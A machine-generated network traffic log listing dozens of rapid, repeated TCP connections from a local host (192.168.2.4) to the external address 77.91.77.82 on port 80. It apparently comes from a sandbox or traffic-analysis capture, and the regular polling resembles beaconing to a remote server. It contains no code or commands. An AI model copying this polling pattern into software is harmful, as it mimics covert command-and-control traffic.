                                                                Jul 5, 2024 04:24:20.188291073 CEST4982080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:20.188436031 CEST804981977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:20.188519001 CEST4981980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:20.188591957 CEST4982080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:20.194423914 CEST804982077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:20.883038998 CEST804982077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:20.883107901 CEST4982080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:20.992094994 CEST4982080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:20.992371082 CEST4982180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:20.997114897 CEST804982077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:20.997128963 CEST804982177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:20.997181892 CEST4982080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:20.997231960 CEST4982180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:20.997517109 CEST4982180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:21.002269983 CEST804982177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:21.690491915 CEST804982177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:21.690550089 CEST4982180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:21.693216085 CEST4982180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:21.693500042 CEST4982280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:21.698380947 CEST804982277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:21.698447943 CEST4982280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:21.698451996 CEST804982177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:21.698688984 CEST4982280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:21.698759079 CEST4982180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:21.704330921 CEST804982277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:22.412617922 CEST804982277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:22.412683010 CEST4982280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:22.522480965 CEST4982280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:22.522741079 CEST4982380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:22.527534962 CEST804982377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:22.527576923 CEST804982277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:22.527632952 CEST4982280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:22.527643919 CEST4982380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:22.527880907 CEST4982380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:22.532591105 CEST804982377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:23.234215021 CEST804982377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:23.235347033 CEST4982380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:23.237699032 CEST4982380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:23.238015890 CEST4982480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:23.242754936 CEST804982477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:23.243453979 CEST4982480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:23.243453979 CEST4982480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:23.248250008 CEST804982477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:23.248635054 CEST804982377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:23.248688936 CEST4982380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:23.959229946 CEST804982477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:23.959286928 CEST4982480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.072238922 CEST4982480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.072472095 CEST4982580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.077354908 CEST804982577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:24.077385902 CEST804982477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:24.077426910 CEST4982580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.077447891 CEST4982480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.077578068 CEST4982580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.082323074 CEST804982577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:24.788667917 CEST804982577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:24.791348934 CEST4982580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.793967962 CEST4982580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.794255018 CEST4982680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.799268961 CEST804982677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:24.799362898 CEST4982680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.799470901 CEST804982577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:24.799483061 CEST4982680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.803330898 CEST4982580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:24.804583073 CEST804982677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:25.516391039 CEST804982677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:25.516462088 CEST4982680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:25.631840944 CEST4982680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:25.632174969 CEST4982780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:25.636970997 CEST804982677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:25.637027025 CEST804982777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:25.637058020 CEST4982680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:25.637105942 CEST4982780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:25.637386084 CEST4982780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:25.642268896 CEST804982777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:26.332293987 CEST804982777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:26.332370043 CEST4982780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:26.335038900 CEST4982780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:26.335294962 CEST4982880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:26.340065002 CEST804982877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:26.340131044 CEST4982880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:26.340352058 CEST4982880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:26.340373993 CEST804982777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:26.340424061 CEST4982780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:26.345110893 CEST804982877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:27.054806948 CEST804982877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:27.054860115 CEST4982880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.163228989 CEST4982880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.163552046 CEST4982980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.168361902 CEST804982977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:27.168418884 CEST4982980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.168540001 CEST804982877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:27.168582916 CEST4982880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.168741941 CEST4982980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.173479080 CEST804982977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:27.889110088 CEST804982977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:27.889173985 CEST4982980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.891727924 CEST4982980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.892090082 CEST4983080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.896763086 CEST804982977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:27.896840096 CEST4982980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.896862984 CEST804983077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:27.897098064 CEST4983080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.897255898 CEST4983080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:27.902091026 CEST804983077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:28.591114998 CEST804983077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:28.591216087 CEST4983080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:28.709898949 CEST4983080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:28.710259914 CEST4983180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:28.714973927 CEST804983077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:28.715070009 CEST804983177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:28.715145111 CEST4983080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:28.715166092 CEST4983180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:28.715435982 CEST4983180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:28.720151901 CEST804983177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:29.409796000 CEST804983177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:29.409852982 CEST4983180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:29.413224936 CEST4983180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:29.413556099 CEST4983280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:29.418281078 CEST804983177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:29.418329000 CEST4983180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:29.418334961 CEST804983277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:29.418394089 CEST4983280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:29.418656111 CEST4983280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:29.423398972 CEST804983277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:30.143394947 CEST804983277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:30.143682957 CEST4983280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.256911039 CEST4983280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.257411957 CEST4983380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.262538910 CEST804983277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:30.262550116 CEST804983377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:30.262587070 CEST4983280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.262628078 CEST4983380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.263017893 CEST4983380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.267880917 CEST804983377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:30.953406096 CEST804983377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:30.953476906 CEST4983380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.955851078 CEST4983380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.956155062 CEST4983480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.960928917 CEST804983377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:30.960948944 CEST804983477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:30.960992098 CEST4983380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.961080074 CEST4983480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.961163998 CEST4983480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:30.966128111 CEST804983477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:31.782732964 CEST804983477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:31.782902002 CEST4983480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:31.898200989 CEST4983480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:31.898536921 CEST4983580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:31.903553009 CEST804983477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:31.903574944 CEST804983577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:31.903647900 CEST4983580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:31.903650045 CEST4983480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:31.904164076 CEST4983580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:31.909207106 CEST804983577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:32.604990959 CEST804983577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:32.607510090 CEST4983580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:32.609652042 CEST4983580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:32.610500097 CEST4983680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:32.614717007 CEST804983577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:32.614765882 CEST4983580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:32.615304947 CEST804983677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:32.615371943 CEST4983680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:32.616256952 CEST4983680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:32.621033907 CEST804983677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:33.313956976 CEST804983677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:33.314040899 CEST4983680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:33.429138899 CEST4983680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:33.429505110 CEST4983780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:33.435278893 CEST804983777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:33.435343027 CEST4983780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:33.435595036 CEST4983780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:33.440493107 CEST804983777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:33.441931009 CEST804983677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:33.441984892 CEST4983680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.128731012 CEST804983777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:34.128813982 CEST4983780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.146080971 CEST4983780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.147598982 CEST4983880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.151149035 CEST804983777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:34.151200056 CEST4983780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.152326107 CEST804983877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:34.152394056 CEST4983880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.156503916 CEST4983880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.161390066 CEST804983877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:34.866027117 CEST804983877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:34.866256952 CEST4983880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.975550890 CEST4983880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.975836039 CEST4983980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.980777979 CEST804983977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:34.980880022 CEST4983980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.981031895 CEST4983980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.981167078 CEST804983877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:34.981211901 CEST4983880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:34.986627102 CEST804983977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:35.705519915 CEST804983977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:35.705847979 CEST4983980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:35.711430073 CEST4983980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:35.712145090 CEST4984080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:35.716739893 CEST804983977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:35.716921091 CEST4983980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:35.717053890 CEST804984077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:35.717119932 CEST4984080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:35.717950106 CEST4984080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:35.722695112 CEST804984077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:36.036055088 CEST4984080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:36.148014069 CEST4984180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:36.152790070 CEST804984177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:36.152971029 CEST4984180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:36.153212070 CEST4984180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:36.157987118 CEST804984177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:36.845216036 CEST804984177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:36.845285892 CEST4984180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:36.848459959 CEST4984180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:36.848958969 CEST4984280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:36.853635073 CEST804984177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:36.853698969 CEST4984180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:36.853698969 CEST804984277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:36.853768110 CEST4984280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:36.854208946 CEST4984280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:36.858985901 CEST804984277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:37.578236103 CEST804984277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:37.578293085 CEST4984280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:37.694083929 CEST4984280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:37.694386959 CEST4984380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:37.699331045 CEST804984277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:37.699343920 CEST804984377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:37.699563026 CEST4984280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:37.699594975 CEST4984380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:37.699867964 CEST4984380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:37.704626083 CEST804984377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:38.408246994 CEST804984377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:38.408298969 CEST4984380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:38.411490917 CEST4984380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:38.411834955 CEST4984480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:38.416558027 CEST804984377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:38.416591883 CEST804984477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:38.416600943 CEST4984380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:38.416652918 CEST4984480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:38.416889906 CEST4984480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:38.422672033 CEST804984477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:39.135279894 CEST804984477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:39.135339975 CEST4984480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.241041899 CEST4984480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.241374969 CEST4984580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.246181011 CEST804984477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:39.246227026 CEST804984577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:39.246253014 CEST4984480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.246296883 CEST4984580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.246499062 CEST4984580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.251480103 CEST804984577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:39.947231054 CEST804984577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:39.947298050 CEST4984580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.949794054 CEST4984580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.950110912 CEST4984680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.954999924 CEST804984677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:39.955219030 CEST804984577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:39.955240011 CEST4984680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.955267906 CEST4984580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.955507994 CEST4984680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:39.960235119 CEST804984677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:40.655013084 CEST804984677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:40.655210018 CEST4984680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:40.777890921 CEST4984680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:40.778156042 CEST4984780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:40.782936096 CEST804984777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:40.783041954 CEST804984677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:40.783102036 CEST4984680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:40.783113956 CEST4984780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:40.783269882 CEST4984780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:40.788038969 CEST804984777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:41.503307104 CEST804984777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:41.507354021 CEST4984780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:41.509602070 CEST4984780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:41.509860039 CEST4984880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:41.514686108 CEST804984877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:41.514800072 CEST804984777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:41.514870882 CEST4984780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:41.515054941 CEST4984880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:41.515055895 CEST4984880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:41.519799948 CEST804984877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:42.211369038 CEST804984877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:42.215362072 CEST4984880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:42.318876028 CEST4984880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:42.319154024 CEST4984980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:42.324022055 CEST804984977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:42.324217081 CEST804984877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:42.327366114 CEST4984880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:42.327373028 CEST4984980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:42.327579021 CEST4984980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:42.332338095 CEST804984977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:43.034066916 CEST804984977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:43.034138918 CEST4984980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.036663055 CEST4984980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.036957979 CEST4985080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.041723967 CEST804985077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:43.041790009 CEST4985080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.041974068 CEST804984977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:43.041984081 CEST4985080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.042018890 CEST4984980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.046715975 CEST804985077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:43.751257896 CEST804985077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:43.751312971 CEST4985080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.866373062 CEST4985080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.866930962 CEST4985180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.871377945 CEST804985077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:43.871659040 CEST804985177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:43.871659040 CEST4985080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.871723890 CEST4985180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.872158051 CEST4985180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:43.876899958 CEST804985177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:44.590300083 CEST804985177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:44.590368032 CEST4985180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:44.593835115 CEST4985180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:44.594305038 CEST4985280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:44.598884106 CEST804985177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:44.598937035 CEST4985180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:44.599174976 CEST804985277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:44.599355936 CEST4985280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:44.599782944 CEST4985280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:44.604510069 CEST804985277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:45.296391964 CEST804985277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:45.299366951 CEST4985280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:45.413238049 CEST4985280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:45.413496017 CEST4985380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:45.418409109 CEST804985377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:45.418421030 CEST804985277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:45.418478012 CEST4985280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:45.418543100 CEST4985380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:45.418724060 CEST4985380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:45.423497915 CEST804985377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:46.119465113 CEST804985377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:46.119530916 CEST4985380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:46.121834993 CEST4985380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:46.122138023 CEST4985480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:46.126863003 CEST804985477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:46.126873016 CEST804985377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:24:46.126923084 CEST4985380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:46.126936913 CEST4985480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:24:46.127119064 CEST4985480192.168.2.477.91.77.82
